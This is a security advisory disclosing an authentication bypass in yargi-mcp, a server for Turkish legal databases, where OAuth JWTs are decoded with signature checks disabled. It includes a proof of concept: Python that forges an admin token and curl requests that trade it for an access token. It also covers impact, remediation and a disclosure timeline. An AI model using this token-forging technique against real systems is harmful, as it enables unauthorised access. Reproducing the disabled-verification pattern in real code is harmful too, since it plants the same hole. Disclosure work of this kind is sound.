Critical Authentication Bypass via JWT Signature Verification Disabled in yargi-mcp

Summary

Eresus Security researchers discovered a critical authentication bypass vulnerability in yargi-mcp, an open-source Model Context Protocol (MCP) server providing access to Turkish legal databases (Yargıtay, Danıştay, Anayasa Mahkemesi, KVKK, BDDK). The OAuth callback endpoint decodes JWT tokens with verify_signature=False, allowing any unauthenticated attacker to forge tokens, impersonate arbitrary users, escalate to admin privileges, and access all protected legal data endpoints.

CVE ID: Pending assignment

Affected Systems

• Software: yargi-mcp v0.2.0 (main branch)
• Files:
  • mcp_auth_http_simple.py — line 164
  • mcp_auth_http_adapter.py — line 203
• Condition: ENABLE_AUTH=true with clerk_backend_api package installed (CLERK_AVAILABLE=True)

Technical Details

The vulnerability resides in the OAuth /auth/callback endpoint. When a Clerk JWT token is received via the clerk_token query parameter, it is decoded using PyJWT with all cryptographic signature verification explicitly disabled:

decoded_token = jwt.decode(clerk_token, options={"verify_signature": False})

This single line defeats the entire purpose of JWT-based authentication. The decoded claims (user_id, email, scopes) are then fully trusted for authentication decisions. At line 177, the server stores the raw, unverified token as real_jwt_token = clerk_token and later returns it verbatim as the OAuth access token at the /token endpoint.

Attack Chain

1. Attacker forges a JWT with arbitrary claims (sub, user_id, email, scopes) using any random signing key
2. Sends forged token to /auth/callback?clerk_token=<forged_jwt>
3. Server decodes without checking signature → issues authorization code (307 redirect)
4. Attacker exchanges code at POST /token → receives the forged JWT as a valid Bearer access_token

Proof of Concept

Step 1 — Forge JWT:

import jwt
fake = jwt.encode({
    'sub': 'admin', 'user_id': 'admin',
    'email': 'admin@target.com',
    'scopes': ['read', 'search', 'admin']
}, 'any_random_key', algorithm='HS256')

Step 2 — Obtain authorization code:

curl -v "http://localhost:8000/auth/callback?client_id=test&redirect_uri=http://localhost:8000/health&clerk_token=$FAKE_JWT"
# Server returns 307 with Location: ...?code=clerk_auth_<hex>

Step 3 — Exchange code for access token:

curl -s -X POST http://localhost:8000/token \
  -d "grant_type=authorization_code&code=clerk_auth_<hex>&redirect_uri=http://localhost:8000/health&client_id=test"
# Returns: {"access_token":"<forged_jwt>","token_type":"Bearer","expires_in":3600,"scope":"read search"}

Impact

CVSS 3.1 Base Score: 9.8 (Critical) Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

• Authentication Bypass (Critical): An attacker can forge a JWT with any identity using any signing key. The server accepts it unconditionally.
• Privilege Escalation (High): Arbitrary scopes including admin can be injected via forged claims with no server-side validation.
• Unauthorized Data Access (High): All Turkish legal database MCP tools become accessible — Yargıtay, Danıştay, Anayasa Mahkemesi, KVKK, BDDK endpoints.
• Subscription & Payment Bypass (Medium): Premium features gated by Stripe subscription checks can be bypassed by forging tokens with appropriate user IDs and scopes.

Remediation

1. Remove verify_signature=False from jwt.decode() in both mcp_auth_http_simple.py:164 and mcp_auth_http_adapter.py:203.
2. Validate JWT signatures against Clerk's JWKS endpoint (/.well-known/jwks.json).
3. Enforce issuer, audience, and expiry claim validation in all token decoding paths.
4. Add redirect_uri allowlist to prevent open redirect chaining.
5. Implement server-side scope validation — never trust client-supplied scope claims without verification.

Timeline

| Date | Event | |------|-------| | 2026-04-02 | Vulnerability discovered by Eresus Security Research during MCP security audit | | 2026-04-02 | Private disclosure request submitted via GitHub Issues (#21) | | 2026-04-02 | Vendor requested to enable GitHub Private Vulnerability Reporting | | 2026-04-04 | Full technical advisory with PoC disclosed publicly |

References

• GitHub Issue #21 — yargi-mcp
• RFC 7519 — JSON Web Token (JWT)
• CWE-345: Insufficient Verification of Data Authenticity
• CWE-287: Improper Authentication
• OWASP API Security Top 10 — API2:2023 Broken Authentication

Credit

Discovered by the Eresus Security research team (Yiğit İbrahim Sağlam, @EresusSecurity) during a proactive MCP ecosystem security audit.